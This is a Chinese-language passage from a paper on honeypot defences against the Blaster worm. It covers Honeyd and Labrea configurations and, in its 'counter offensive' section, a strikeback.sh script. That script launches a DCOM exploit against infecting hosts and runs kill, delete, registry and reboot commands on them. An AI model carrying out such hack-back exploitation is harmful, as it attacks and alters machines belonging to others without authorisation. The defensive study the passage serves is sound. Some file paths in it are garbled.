设置蜜罐来诱扑冲击波蠕虫.要用到叫做arpd的demon.具体配置如下:

　　create default

　　set default personality "Windows XP Pro"

　　add default tcp port 135 open

　　set default tcp action block

　　set default udp action block

　　有了这个配置,冲击波蠕虫就会对不存在运行着蜜罐的IP进行攻击,蠕虫会以为对方开着135端口的漏洞主机.通过这门技术,冲击波蠕虫就会被伪造的信息欺骗,达到拖延时间,进而通知管理员,采取措施,对进程中的程序进行清理.避免遭到冲击波的控制.

　　如果一个新的蠕虫设计过于复杂,这个蜜罐就不是那么好配置了.

　　3.3.2 对蜜罐的缓慢的回应

 
 
 
  
 
 
　　继续前一章的，蜜罐能监视所进来得请求的数据，使在网络层的对蠕虫的回应减慢，这项技术以被使用，所用到的工具叫做Labrea。这个Unix daemon 能对未存在的IP作出回应。为了模拟对攻击者的TCP session。它使用合法的RFC的文档，来最大化的拖延TCP session的时间。为了避免蠕虫的攻击，TCP window size 始终保持为0。

　　通常下蠕虫都是以一个进程在受害主机上的。在内核中使用classic network calls来到处传播，在用户的领域使用classic API。蠕虫不知道网络为什么运行这么慢，它会减慢并阻塞伪造的目标。

　　作为实验，Labrea已成功地战胜了红色代码蠕虫，它也可能对付其他的蠕虫攻击。在未来的Honeyd 系统中将添加这样的功能。

　　尽管这种防守体系有很多缺点，比如多线程的蠕虫或未意识到的蠕虫会同时攻击一些目标，而不会阻塞我们伪造的目标。

　　3.3.3 我们应采取什么反击措施

　　一些已发布的反击措施

　　*孤立一些主机

　　*关闭蠕虫敏感的远程的服务

　　*对远程设备(路由器，防火墙等等)制定合适的流量监控

　　　3.4 Launching a counter offensive

　　这里有一个通过Honeyd配置的例子，

　　create default

　　set default personality "Windows XP Pro"

　　add default tcp port 135 open

　　add default tcp port 4444 "/bin/sh scripts/strikeback.sh $ipsrc"

　　set default tcp action block

　　set default udp action block

　　蜜罐的TCP 135端口开着，并接受冲击波蠕虫的攻击，幸运的是，蠕虫没有检查RPC 回应的完整。因此，蜜罐经过三次握手的过程，来检测非法的数据包。

　　然后，我们添加一个4444端口服务，它可以让冲击波获得远程的SHELL，包括通过TFTP来执行下载代码。这个伪造的SHELL将通过一个叫做strikeback.sh来欺骗蠕虫。

　　以下是运行在Windows XP Pro系统下的strikeback.sh程序，

　　!#/bin/sh

　　# Launches a DCOM exploit toward the infected attacking host

　　# and then run cleaning commands in the remote DOS shell obtained

　　./dcom_exploit -d $1 << EOF

　　REM Executes the following orders on the host :

　　REM 1) Kill the running process MSBlast.exe

　　taskkill /f /im msblast.exe /t

　　REM 2) Eliminate the binary of the worm

　　del /f %SystemRoot%system32msblast.exe

　　REM 3) Clean the registry

　　echo Regedit4 > c: cleanerMSB.reg

　　echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >> c:cleanerMSB.reg

　　echo "auto windows update" = "REM msblast.exe" >> c: cleanerMSB.reg

　　regedit /s c: cleanerMSB.reg

　　del /f c:cleanerMSB.reg

　　REM N) Specific actions to update the Windows host could be added here

　　REM N+1) Reboot the host

　　shutdown -r -f -t 0 exit

　　EOF

　　4、总结

　　蜜罐技术已成为对抗蠕虫的有效措施。它们把蠕虫的流量重定向到伪造的主机上，以至于扑获到蠕虫并分析它们的特征，来限制蠕虫在网络上的传播。